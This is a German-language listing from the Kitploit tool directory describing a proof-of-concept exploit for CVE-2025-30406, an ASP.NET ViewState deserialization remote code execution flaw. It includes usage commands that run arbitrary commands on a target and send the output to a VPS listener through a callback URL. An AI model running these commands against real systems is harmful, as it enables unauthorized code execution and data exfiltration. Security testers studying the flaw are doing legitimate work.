Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-30406 — CVE-2025-30406 ViewState Exploit PoC | Kitploit
Tools/GitHubGitHub/mchklt/cve-2025-30406
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 ViewState Exploit PoC

Repository anzeigen
90184vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-30406 ViewState Exploit PoC

Überblick

Dies ist ein Proof-of-Concept-Skript (PoC), das einen ViewState-Deserialisierungs-Exploit für CVE-2025-30406 in ASP.NET-Anwendungen demonstriert. Es verwendet ysoserial, um eine bösartige ViewState-Nutzlast zu erzeugen, und sendet sie an eine benutzerdefinierte URL, um einen angegebenen Befehl auszuführen. Für beste Ergebnisse kann die Befehlsausgabe an einen benutzerdefinierten HTTP-Server (server.py) exfiltriert werden, der auf einem VPS läuft und die Ergebnisse in einem formatierten Stil mit Zeitstempeln, grünen Eingabeaufforderungen und weißem Ausgabetext anzeigt. Dieses Skript dient nur zu Bildungszwecken und darf ausschließlich auf Systemen verwendet werden, für die Sie ausdrückliche Genehmigung für Sicherheitstests haben. Unbefugte Nutzung ist illegal und unethisch.

CVE-Details

  • CVE-ID: CVE-2025-30406
  • Beschreibung: Eine Deserialisierungsschwachstelle in der ASP.NET-ViewState-Verarbeitung, die Remote-Codeausführung ermöglicht, wenn ein gültiger Validierungsschlüssel und Generator bekannt sind.
  • Betroffene Systeme: ASP.NET-Anwendungen mit verwundbaren ViewState-Konfigurationen.
  • Voraussetzungen für die Ausnutzung:
    • Zugriff auf einen gültigen ViewState-Validierungsschlüssel und Generator.
    • Ein verwundbarer Endpunkt, der ViewState-Parameter akzeptiert.

Repository-Inhalt

  • exploit.py: Das Haupt-PoC-Skript zum Erzeugen und Senden der ViewState-Nutzlast.
Tool herunterladen
  • server.py: Ein HTTP-Server zum Empfangen und Anzeigen der exfiltrierten Befehlsausgabe in einem formatierten Stil.
  • README.md: Diese Datei mit Setup- und Verwendungsanweisungen.
  • Voraussetzungen

    • Python 3.x
    • requests-Bibliothek (pip install requests)
    • ysoserial-Programm (Windows oder entsprechendes Äquivalent für Ihre Plattform)
    • Ein verwundbarer ASP.NET-Anwendungsendpunkt
    • Ein VPS oder Server zum Ausführen von server.py (für die Exfiltration empfohlen)
    • Genehmigung zum Testen des Zielsystems

    Installation

    1. Klonen Sie dieses Repository:
      root@kitploit:~
      git clone https://github.com/yourusername/cve-2025-30406-poc.git
      cd cve-2025-30406-poc
      
    2. Installieren Sie das erforderliche Python-Paket:
      root@kitploit:~
      pip install requests
      
    3. Laden Sie ysoserial herunter und platzieren Sie es im selben Verzeichnis wie exploit.py oder geben Sie seinen Pfad an:
      • ysoserial GitHub

    Einrichtung auf einem VPS (empfohlen)

    Um die exfiltrierte Befehlsausgabe in einem formatierten Stil zu empfangen, führen Sie server.py auf einem VPS aus:

    1. Kopieren Sie server.py auf Ihren VPS (z. B. per scp):
      root@kitploit:~
      scp server.py user@your-vps-ip:/home/user/
      
    2. Stellen Sie sicher, dass Python 3 installiert ist:
      root@kitploit:~
      sudo apt update && sudo apt install python3 python3-pip
      
    3. Starten Sie den Server (Standardport 8000):
      root@kitploit:~
      python3 server.py
      
    4. Stellen Sie sicher, dass die VPS-Firewall eingehenden Datenverkehr auf Port 8000 zulässt:
      root@kitploit:~
      sudo ufw allow 8000
      
    5. Notieren Sie die öffentliche IP oder Domain des VPS (z. B. http://your-vps-ip:8000) zur Verwendung mit dem -e-Flag in exploit.py.

    Verwendung

    Ausführen des Exploits

    Führen Sie exploit.py mit den erforderlichen Argumenten aus. Das -e-Flag ist optional, wird aber dringend empfohlen, um die Befehlsausgabe zur formatierten Anzeige an server.py zu exfiltrieren.

    root@kitploit:~
    python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
    

    Argumente

    • -u, --url: Ziel-URL (z. B. http://target.com/page.aspx) [Erforderlich]
    • -c, --command: Auszuführender Befehl (z. B. whoami) [Erforderlich]
    • -y, --ysoserial: Pfad zur ysoserial-Programmdatei (Standard: ./ysoserial.exe) [Optional]
    • -e, --exfil: Callback-URL zum Exfiltrieren der Befehlsausgabe (z. B. http://your-vps:8000) [Optional]

    Beispiele

    1. Ohne Exfiltration ausführen (Blindausführung):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
      
    2. Mit Exfiltration an einen VPS ausführen, auf dem server.py läuft (empfohlen):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
      

    Ausführen des Servers

    Starten Sie auf Ihrem VPS oder Ihrer lokalen Maschine den HTTP-Server, um die exfiltrierte Ausgabe zu empfangen:

    root@kitploit:~
    python3 server.py
    

    Der Server zeigt die Befehlsausgabe mit Zeitstempeln, einer grünen $-Eingabeaufforderung und weißem Text zur besseren Lesbarkeit an.

    Funktionsweise

    1. Exploit-Skript (exploit.py):
      • Verwendet ysoserial mit einem fest codierten Validierungsschlüssel und Generator, um eine ViewState-Nutzlast zu erstellen.
      • Wenn -e angegeben ist, wird der Befehl so umschlossen, dass die Ausgabe erfasst und über Invoke-WebRequest an die Callback-URL gesendet wird.
      • Sendet die Nutzlast in einer POST-Anfrage an die Ziel-URL, eingebettet in den Parameter __VIEWSTATE.
      • Gibt den Antwortstatus des Servers und einen Teil des Antworttexts aus.
    2. HTTP-Server (server.py):
      • Lauscht auf GET-Anfragen, die Befehlsausgabe enthalten.
      • Dekodiert den URL-Pfad und teilt ihn in Zeilen auf.
      • Gibt jede Zeile mit einem Zeitstempel, einer grünen $-Eingabeaufforderung und weißem Ausgabetext aus.
      • Antwortet mit HTTP 200 und „OK“.

    Warnung zur ethischen Nutzung

    • Dieses Skript ist ein Proof-of-Concept für CVE-2025-30406 für Bildungs- und autorisierte Sicherheitstestzwecke.
    • Verwenden Sie dieses Skript nicht auf Systemen ohne ausdrückliche Genehmigung des Systeminhabers.
    • Missbrauch kann Gesetze verletzen, einschließlich des Computer Fraud and Abuse Act (CFAA) in den USA oder ähnlicher Gesetze in anderen Ländern.
    • Holen Sie vor dem Testen eines Systems immer eine schriftliche Einwilligung ein.
    • Melden Sie Schwachstellen verantwortungsvoll über koordinierte Offenlegung oder Bug-Bounty-Programme.

    Einschränkungen

    • Der fest codierte Validierungsschlüssel und Generator funktionieren möglicherweise nur für bestimmte verwundbare Anwendungen. Benutzer benötigen möglicherweise anwendungsspezifische Werte.
    • Der Exploit zielt auf ASP.NET-Anwendungen ab, die für ViewState-Deserialisierung anfällig sind.
    • Das Skript nimmt an, dass der Zielserver die ViewState-Nutzlast korrekt verarbeitet.
    • Die plattformübergreifende Kompatibilität hängt von der Verfügbarkeit von ysoserial ab (hauptsächlich Windows-basiert).
    • Für die Exfiltration ist ein öffentlich erreichbarer Server für die -e-Callback-URL erforderlich.

    Lizenz

    Dieses Projekt ist unter der MIT-Lizenz lizenziert. Weitere Details finden Sie in der Datei LICENSE.

    Kontakt

    Bei Fragen oder Feedback eröffnen Sie bitte ein Issue in diesem Repository.